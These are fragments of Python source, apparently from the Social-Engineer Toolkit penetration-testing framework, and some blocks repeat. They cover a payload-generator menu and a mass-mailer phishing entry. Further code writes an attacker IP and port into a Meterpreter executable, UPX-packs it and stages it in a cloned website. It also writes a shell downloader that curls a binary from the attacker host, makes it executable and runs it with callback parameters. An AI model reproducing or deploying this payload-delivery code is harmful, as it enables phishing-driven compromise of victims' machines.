if main_menu_choice == '4': filewrite = file("src/program_junk/payloadgen", "w") filewrite.write("payloadgen=solo") filewrite.close() sys.path.append("src/core/payloadgen/") try: reload(create_payloads) except: import create_payloads setcore.PrintStatus("Your payload is now in the root directory of SET as msf.exe") if os.path.isfile("src/program_junk/meterpreter.alpha"): print "[*] Saving alphanumeric shellcode in root directory of SET as meterpreter.alpha" subprocess.Popen("cp src/program_junk/meterpreter.alpha ./", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) subprocess.Popen("cp src/html/msf.exe ./msf.exe 1> /dev/null 2> /dev/null", shell = True).wait() # if we didn't select the SET interactive shell or RATTE if not os.path.isfile("src/program_junk/set.payload"): setcore.upx("msf.exe") # if the set payload is there if os.path.isfile("src/program_junk/set.payload"): subprocess.Popen("cp src/program_junk/msf.exe ./msf.exe 1> /dev/null 2> /dev/null", shell = True).wait() try: reload(solo) except: import solo raw_input("\nPress " + setcore.bcolors.RED + "{return}" + setcore.bcolors.ENDC + " to head back to the menu.") # Main Menu choice 5: Mass Mailer Attack if main_menu_choice == '5': sys.path.append("src/phishing/smtp/client") try: reload(smtp_web) except: import smtp_web
filewrite = open("src/program_junk/msf.exe", "wb") host = int(len(ipaddr) + 1) * "X" rPort = int(len(str(port)) + 1) * "Y" filewrite.write(data.replace(str(host), ipaddr + "\x00", 1)) filewrite.close() fileopen = open("src/program_junk/msf.exe", "rb") data = fileopen.read() filewrite = open("src/program_junk/msf.exe", "wb") filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1)) filewrite.close() setcore.PrintStatus("Done, moving the payload into the action.") if upx_encode == "ON" or upx_encode == "on": # core upx setcore.upx("src/program_junk/msf.exe") subprocess.Popen( "cp src/program_junk/msf.exe src/program_junk/web_clone/msf.exe", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) if payload_selection == "SETSHELL": subprocess.Popen( "cp src/payloads/set_payloads/shell.windows src/program_junk/web_clone/x", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) # if we are targetting nix if posix == True:
filewrite = open("src/program_junk/msf.exe", "wb") host = int(len(ipaddr)+1) * "X" rPort = int(len(str(port))+1) * "Y" filewrite.write(data.replace(str(host), ipaddr+"\x00", 1)) filewrite.close() fileopen = open("src/program_junk/msf.exe", "rb") data = fileopen.read() filewrite = open("src/program_junk/msf.exe", "wb") filewrite.write(data.replace(str(rPort), str(port)+"\x00", 1)) filewrite.close() setcore.PrintStatus("Done, moving the payload into the action.") if upx_encode == "ON" or upx_encode == "on": # core upx setcore.upx("src/program_junk/msf.exe") subprocess.Popen("cp src/program_junk/msf.exe src/program_junk/web_clone/msf.exe", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) if payload_selection == "SETSHELL": subprocess.Popen("cp src/payloads/set_payloads/shell.windows src/program_junk/web_clone/x", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) # if we are targetting nix if posix == True: setcore.PrintInfo("Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...") filewrite = file("%s/src/program_junk/web_clone/mac.bin" % (definepath), "w") payload_flags = webserver.split(" ") # grab osx binary name osx_name = setcore.generate_random_string(10,10) downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2]) filewrite.write(downloader) filewrite.close()